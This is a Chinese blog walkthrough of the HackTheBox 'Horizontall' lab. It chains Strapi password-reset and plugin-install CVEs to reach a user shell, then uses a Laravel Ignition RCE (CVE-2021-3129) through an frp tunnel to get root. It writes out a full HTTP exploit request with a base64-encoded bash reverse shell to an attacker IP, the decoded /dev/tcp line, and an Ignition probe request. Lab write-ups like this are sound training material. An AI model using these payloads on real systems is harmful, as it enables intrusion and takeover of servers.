HackTheBox-Horizontall WP

最新推荐文章于 2024-05-28 10:25:19 发布
最新推荐文章于 2024-05-28 10:25:19 发布
阅读量1.7k 收藏 3
点赞数 2
分类专栏: HackTheBox 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a709046532/article/details/120167334
版权

0x01 准备

该靶机设置了域名,需要手动在host文件配置ip地址。

image-20210905215302816



配置完成后即可访问靶机。看到vue的图标也就不难看出这是一个前后端分离的网站,我们的目标应该主要放在后端的接口上。

image-20210905220136069




0x02 user.txt

我安装的burp插件帮我找到了一个子域名,同样我们需要将其录入hosts文件中绑定靶机的ip,这样才能正常访问:

image-20210905220111940



如下即可:

image-20210905220548469



访问得到结果,但是不是我们想要的东西,我们可以通过目录扫描的方式查找接口:

image-20210905220416284



对主域名horizontall.htb的目录扫描没有发现有用的情况,但是对api-prod.horizontall.htb的扫描能够找到后台管理界面:

image-20210905222424220

image-20210905222400016



访问后台界面:

image-20210905222622577



尝试爆破无果,将目标转移到CVE上。一番搜索后锁定了两个CVE:

image-20210907165146862



嗯,也就是我们需要打一个组合拳。

首先是利用未授权更改密码的CVE添加管理员密码,并获取token。

image-20210906105916891



添加账号后我们能够进入后台,但是后台找了一圈没有有用的功能点,需要继续利用第二个漏洞进行RCE。

image-20210906110103051



将第二个CVE的有效payload提取出来,并替换自己的命令。如下:

这里需要注意的是不能直接使用明文的反弹shell命令,如bash -i > /dev/tcp/192.168.25.144/8888 0>&1,后面测试发现应该是重定向符&会干扰。应该是被识别成了传参的分隔符吧。

POST /admin/plugins/install HTTP/1.1
Host: api-prod.horizontall.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwOTA0NTk0LCJleHAiOjE2MzM0OTY1OTR9.eJILaL-n15d9EYeDtbA_tU5509SQllz2XKKMG2xqH1M
Content-Length: 112
Content-Type: application/x-www-form-urlencoded

plugin=documentation%26%26+$(echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4xNjgvMjMzMyAwPiYx+|+base64+-d+|+bash)

payload解码后如下:

YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4xNjgvMjMzMyAwPiYx

                      ↓

bash -i >& /dev/tcp/10.10.14.168/2333 0>&1


使用nc命令开启即可拿到反弹的shell:

image-20210907170112289



这里可以使用python的命令获得一个更好使的pty:

python3 -c 'import pty; pty.spawn("/bin/bash")'

这样我们可以拿到user的flag了,如果想拿root的flag需要进一步提权。




0x03 root.txt

使用linpeas扫了一圈没啥收获。然后这里之后我就卡住了。

两天后回来继续看,去论坛和别的老哥交流了一下,给的提示是关注可疑的开放端口。

然后又回linpeas看了看端口,发现确实有可疑的端口:

image-20210907171216367



这里探测了一下,1337端口是后端的api-prod.horizontall.htb处理的端口,应该是做了反向代理。

继续,那就是需要架设隧道来进行访问了。使用ssh尝试远端转发未果,上frp。frp配置如下:

image-20210907171709316



使用wget下载,然后运行:

image-20210907144742849



访问本机8000端口查看,发现是laravel框架:

image-20210907144819282



转了一圈依旧没有发现有用信息,遂考虑CVE。网上搜了一圈找到了今年爆出的一个RCE漏洞:

image-20210907171945230



该漏洞检测的poc如下,如果返回值为500则大概率说明漏洞存在:

POST /_ignition/execute-solution HTTP/1.1
Host: 139.xxxxxx:8080
Content-Type: application/json
Content-Length: 168

{
  "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
  "parameters": {
    "variableName": "username",
    "viewFile": "xxxxxxx"
  }
}

执行结果如下,可以判断该框架很可能存在漏洞:

image-20210907153411039



这里为了省时间直击上网找了exp,地址为 https://github.com/zhzyker/CVE-2021-3129 。

这里需要注意的是,该exp不能使用127.0.0.1作为地址(至少在我测试的过程中是这样的),原因不明。

运行exp,可以得到结果,可以看到是root。这样我们如果拿到shell的话就是root权限了:

image-20210907154709059



验证漏洞存在后可以修改payload,让它弹一个shell回来。这里为了排除干扰也是选择了把payload放在攻击机上。

image-20210907172742029



test.txt 的文件内容如下:

image-20210907163250421



运行exp,成功拿到root的shell。查看flag即可。

image-20210907163455505




0x04 后记

emm。。值得一提的是这个box的评级居然只是easy。论坛上也有很多老哥吐槽说应该设成medium。

复盘一下思路吧,这个靶机还是很有意思的:

  1. 利用了两个CVE组合拳打下user权限的shell
  2. 利用开设在本机的服务提权,再次利用CVE拿下root的shell

总结起来就是这两句话,但这条路要是自己摸索出来的话还是会踩很多坑的。总之也是又学了一些东西,还不错

h1nt
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
Hack The Box,一款有意思的渗透测试平台
m0_60571990的博客
11-28 6464
Hack The Box,一款有意思的渗透测试平台
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
HackTheBox-Machines--Lame
最新发布
七天
05-28 305
枚举共享驱动器,并查看权限,发现/tmp目录具有读取和写入权限。使用hydra、medusa等工具进行暴力破解。
HackTheBox靶场系列(一)之HackTheBox靶场简介
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-30 3124
Hack The Box是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中有许多模拟真实场景的机器。HackTheBox靶场是一个虚拟的渗透测试训练平台,用于帮助安全研究人员、渗透测试人员和学生提高他们的技能。它包含一系列的虚拟机,其中每一个虚拟机都代表一个可攻击的目标系统。通过攻击这些虚拟机和解决它们的漏洞,用户可以提高自己的技能和知识,以更好地了解实际环境中的攻击和防御。
Hack The Box 玩转指南:初学者到高手的渗透测试之旅》
2201_75353421的博客
01-30 1548
Hack The Box 实战指南:从注册到成功通关的渗透测试之旅》介绍了在Hack The Box平台上进行渗透测试的全过程。从注册开始,通过连接实验室、生成自己的服务器,一直到成功通关的每一步都得到详细解说。这是一篇适合初学者的实用指南,旨在帮助读者提高渗透测试技能和实际操作经验。
hack the box 注册时全名无效、reCapcha validation等注册问题
weixin_68177269的博客
03-12 3995
本篇文章主要记述了在注册hack the box时候遇到的问题及其解决办法。同样可以应用在注册其他外网的情况下。
all-in-one-wp-migration-file-extension.zip
04-07
《全面解析WordPress迁移插件:All-in-One WP Migration File Extension》 在WordPress的世界里,数据迁移是一项常见的任务,无论是为了网站备份、迁移至新的主机,还是进行开发测试,都需要高效且可靠的工具。All-...
All-in-One WP Migration 插件
12-03
**All-in-One WP Migration 插件详解** 在WordPress的生态系统中,All-in-One WP Migration(全功能WordPress迁移)是一款至关重要的工具,它为用户提供了简便且全面的数据迁移解决方案。这款插件允许用户轻松地将...
all-in-one-wp-migration:多合一WP迁移-无限制importexport
04-09
《全面解析多合一WP迁移插件:实现无限导入与导出》 在WordPress的世界中,数据迁移是一项常见的任务,无论是为了备份、站点迁移还是多站点管理。"All In One WP Migration" 插件正是为此而生,它为用户提供了一种...
CTF-7#GET THE PASS!-WP
10-23
CTF-7#GET THE PASS!-WP 本文将详细介绍 CTF-7#GET THE PASS!WP 竞赛的解决方案,包括工具的使用、上传和执行、获取管理员账户名和密码、修改 ACL 权限、打开文件和获取 flag 等。 一、工具介绍 在本次 CTF ...
Domas-Breaking-The-x86-Instruction-Set-wp.pdf
08-21
Domas-Breaking-The-x86-Instruction-Set-wp.pdf
hackthebox注册教程
shy的博客
02-01 1万+
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现需要邀请码,上网搜了搜,发现邀请码得靠自己获取,好吧,我接受这个挑战。 使用view-source:https://www....
入坑 Hack The Box
LainWith的博客
10-19 1万+
视频介绍:https://www.bilibili.com/video/BV17T4y1i7Uh 官方文档:https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box个人感觉前者偏向实战一些,后者偏向练习题一些。更详细的区别,参见: https://hacktalk.net/hacking-the-box-htb-vs-vulnhub/过去注册HTB的时候,需要拿到邀请码才行,类似下面视频这种,但是现在你不需要邀请
HackTheBox 如何使用
网络安全学习
04-14 4621
如何开始? 1.到官网注册一个账号 https://www.hackthebox.com/ 2.验证自己的邮箱 3.下载 openvpn 4.到左边的 labs 实验室开始学习或直接点击 start point 5.点击想要完成的靶机,比如第 0 层的第一个靶机,选择 connnect to htb 选择 openvpn 会自动下载 openvpn 的文件,然后用 openvpn 导入,稍等一下即可连接 在 kali(linux)中如何连接? 同样是执行下载的文件 ┌──(root💀kali)-[~/d
Hack The Box靶场使用流程及方法
z875611510的博客
06-09 3879
协议有两个:UDP1337、TCP443,应该是连接VPN走的端口,既然我们是在中国,还是选择UDP这种无连接的协议比较好。国内视频介绍(kali连接htb):https://www.bilibili.com/video/BV1Q94y1f73u。以上就是hackthebox靶场的使用和第一关详解,总的来说这个靶场还是基础的,里面的资源也比较丰富,适合安全初学者入门。登录我们的HTB账号,点击右上角的“CONNECT TO HTB”,上面有两个选项,这里选择入门的就行。
第一章 网络安全从实战入门 hack the box
qq_42676415的博客
04-24 629
这会下载一个后缀为ovpn的文件,这个文件就是链接hack the box 的网络文件。(3)输入openvpn (路径)文件名,然后回车开始链接hack the box 的网络。二、我们使用kali系统,这个可以安装虚拟机,网络上教程一大堆,不在手把手教。(不会安装,不知道如何在官网下载的可以私信我)(2)输入sudo -I 命令切换为超级管理员用户。我们利用hack the box 进行教学,官方网址。在终端显示如下后,刷新网页如下右边就是链接成功。三、链接hack the box 的网络。
HackTheBox-Starting Point--Tier 1---Ignition
七天
11-06 155
搜索Magento相关信息可知,默认账户admin,密码为7个及以上字符,但是反暴力破解,尝试手工测试常见密码。通过nmap扫描结果发现http-title返回值没有重定向到http://ignition.htb。
老实本分——HackTheBox入门
m0_68407377的博客
12-28 780
尽量将VPN接入自己的虚拟机中(kail),不然别人和你使用同一个机器人的时候,会跟你再同一个网段。注意:FULLNAME中间需要一个空格。使用telnet命令来获得flag。账户root,可以不用密码直接进入。页面有指示,可以按照这来。第八个问题获得flag。
手把手教会你--Hack The Box的账号注册(HTB Labs部分)
m0_74317362的博客
11-27 1652
请务必跟着博主复现一遍。
--wp--preset--color--black:这是什么
07-12
`--wp--preset--color--black` 是一个以双短横线开头的 CSS 自定义属性(CSS Custom Property)。 这个属性看起来是一个特定于某个平台或框架的命名约定,其中 `wp` 可能代表 WordPress,`preset` 可能代表预设,`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

h1nt

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值